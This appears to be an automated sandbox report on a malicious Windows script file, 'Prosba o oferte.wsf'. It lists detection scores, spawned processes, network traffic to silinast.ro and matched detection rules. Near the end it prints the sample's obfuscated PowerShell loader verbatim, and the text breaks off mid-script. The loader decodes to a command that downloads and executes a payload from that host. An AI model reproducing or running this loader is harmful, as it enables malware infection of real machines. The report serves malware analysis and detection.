Source: silinast.ro |
Virustotal: Detection: 10% |
Source: http://silinast.ro |
Virustotal: Detection: 10% |
Source: http://silinast.ro/Kommunikuternes.inf |
Virustotal: Detection: 9% |
Source: Prosba o oferte.wsf |
Virustotal: Detection: 8% |
Source: Prosba o oferte.wsf |
ReversingLabs: Detection: 13% |
Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 98.7% probability |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2136856117.000002CC9D1CD000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: 6777.6777.6777.677e |
Source: global traffic |
DNS traffic detected: DNS query: silinast.ro |
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC866B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://silinast.ro |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://silinast.ro/Kommunikuternes.infP |
Source: powershell.exe, 00000009.00000002.4214260996.00000000046A9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://silinast.ro/Kommunikuternes.infXR$lX |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://silinast.roXR |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://silinast.roXh |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC8590B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: amsi64_7468.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_7936.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. 
E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHet |